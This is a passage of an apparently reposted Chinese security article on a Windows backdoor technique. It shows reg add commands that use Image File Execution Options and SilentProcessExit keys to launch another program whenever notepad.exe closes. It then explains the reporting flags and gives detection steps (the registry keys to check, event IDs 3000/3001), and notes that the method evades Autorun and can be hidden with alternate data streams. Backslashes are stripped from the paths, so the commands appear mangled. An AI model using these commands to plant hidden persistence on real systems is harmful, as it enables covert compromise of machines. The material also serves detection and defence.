HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsnotepad.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExitnotepad.exe

这么一来，可以直接在命令行中对注册表进行设置，需要管理员权限。

reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsnotepad.exe" /v GlobalFlag /t REG_DWORD /d 512reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExitnotepad.exe" /v ReportingMode /t REG_DWORD /d 1reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExitnotepad.exe" /v MonitorProcess /t REG_SZ /d "c:windowssystem32taskmgr.exe"

​ 简单解释一下ReportingMode和MonitorProcess 这两个项值的作用。MonitorProcess的值表示监视器进程。Reporting Mode可以设置为三个值 。

FlagValue解释

LAUNCH_MONITORPROCESS	0x1	检测到进程静默退出时，将会启动监视器进程（在GFLAGS.exe中，Silent Process Exit这个选项卡所填写的值，即MonitorProcess的项值）
LOCAL_DUMP	0x2	检测到进程静默退出时，将会为受监视的进程创建转储文件
NOTIFICATION	0x4	检查到进程静默退出时，将会弹出一个通知

0x06 检测及查杀

排查HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options 以及HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExit项值是否存在关联。分析系统日志，日志ID为3000和3001，即有可能存在后门威胁。直接删除IFEO项或者设置管理员不可修改

0x07 总结

本文分析总结了关于映像劫持的的一种新型后门技术：当一个程序关闭时会允许执行其他的二进制文件。且Autorun暂时检测不到。该技巧需要管理员权限，普通用户没有执行权限。可以结合ADS技术（alternate data streams，NTFS交换数据流）执行，更加的隐蔽。感兴趣的同学可以自己测试一下。本文由网络上转载。